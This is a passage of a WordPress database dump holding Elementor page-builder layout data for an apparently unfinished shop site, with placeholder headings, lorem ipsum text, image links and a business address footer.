NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8534,1492,'_elementor_page_assets','a:0:{}'),(8546,1494,'_elementor_edit_mode','builder'),(8547,1494,'_elementor_template_type','wp-page'),(8548,1494,'_elementor_version','3.7.7'),(8549,1494,'_wp_page_template','elementor_canvas'),(8550,1494,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"}],\"faq_schema\":\"yes\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8551,1494,'_elementor_page_assets','a:0:{}'),(8553,1495,'_elementor_edit_mode','builder'),(8554,1495,'_elementor_template_type','wp-page'),(8555,1495,'_elementor_version','3.7.7'),(8556,1495,'_wp_page_template','elementor_canvas'),(8557,1495,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\